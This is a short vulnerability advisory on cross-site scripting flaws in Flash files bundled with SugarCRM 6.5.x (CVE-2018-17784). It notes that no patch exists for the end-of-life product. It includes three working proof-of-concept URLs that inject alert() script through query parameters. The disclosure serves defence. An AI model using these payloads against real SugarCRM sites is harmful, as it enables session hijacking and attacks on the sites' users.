Vulnerability
Purplemet Lab team discovered multiple cross-site scripting (XSS) vulnerabilities in SugarCRM 6.5.x (CVE-2018-17784). These versions embed the following third party components: FlashCanvas which provides flashcanvas.swf and YUI which provides uploader.swf and io.swf. These Flash files are vulnerable to a cross-site scripting.
Solution
SugarCRM Community Edition 6.5 reached its end-of-life and is no longer supported. SurgarCRM 6.5.26 is the last version and no patches will be provided by the vendor.
Proof of concept
The vulnerabilities can be triggered using the following URL:
http://ip/sugarcrm/include/javascript/yui/build/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//
http://ip/sugarcrm/include/javascript/yui3/build/io/io.swf?yid=\%22));}catch(e){alert('XSS');}//
http://ip/sugarcrm/include/SugarCharts/Jit/FlashCanvas/flashcanvas.swf?id=12345678\%22));}catch(e){alert(%27XSS%27)}//
Purplemet technology detection
Purplemet detects SurgarCRM with version, YUI and flags FlashCanvas as Unsafe component.
